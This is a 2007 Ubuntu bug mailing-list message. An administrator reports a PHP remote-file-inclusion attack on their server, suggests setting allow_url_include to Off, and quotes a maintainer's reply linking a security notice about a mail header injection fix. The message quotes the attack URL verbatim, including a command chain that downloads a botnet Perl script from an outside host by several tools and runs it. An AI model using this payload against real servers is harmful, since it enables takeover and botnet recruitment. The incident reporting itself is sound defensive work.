The default installation leaves servers vulnerable. Having spent some time on PHP security I still have not found an acceptable compromise of functionality and security.
The latest exploit here involved urls like - http://silverdollarmusicpark.com/index1.php?content=http://kuskitiz0r.kit.net/cmdpriv8/tool25.dat?&cmd=cd /tmp;wget http://msnpassport.t5.com.br/bot/b0tnet.txt;fetch http://msnpassport.t5.com.br/bot/b0tnet.txt;curl -O http://msnpassport.t5.com.br/bot/b0tnet.txt;lynx http://msnpassport.t5.com.br/bot/b0tnet.txt > b0tnet.txt;GET http://msnpassport.t5.com.br/bot/b0tnet.txt > b0tnet.txt;lwp-download http://msnpassport.t5.com.br/bot/b0tnet.txt;perl b0tnet.txt ; Whether to allow include/require to open URLs (like http:// or ftp://) as files. allow_url_include = Off plugs this hole (I think) /etc/php5/apache2/php.ini should be reasonably safe by default. On 5/14/07, Kees Cook <[EMAIL PROTECTED]> wrote: > Thanks for taking the time to report this bug and helping to make Ubuntu > better. This problem has already been addressed with the following USN: > > http://www.ubuntu.com/usn/usn-455-1 > > Please feel free to report future bugs. > > ** Visibility changed to: Public > > ** Changed in: php-mail (Ubuntu) > Importance: Undecided => High > Assignee: (unassigned) => Kees Cook > Status: Unconfirmed => Fix Released > > -- > PHP Folded Mail Headers Email Header Injection Vulnerability > https://bugs.launchpad.net/bugs/113249 > You received this bug notification because you are a direct subscriber > of the bug. > -- PHP Folded Mail Headers Email Header Injection Vulnerability https://bugs.launchpad.net/bugs/113249 You received this bug notification because you are a member of Ubuntu Bugs, which is the bug contact for Ubuntu. -- ubuntu-bugs mailing list [email protected] https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
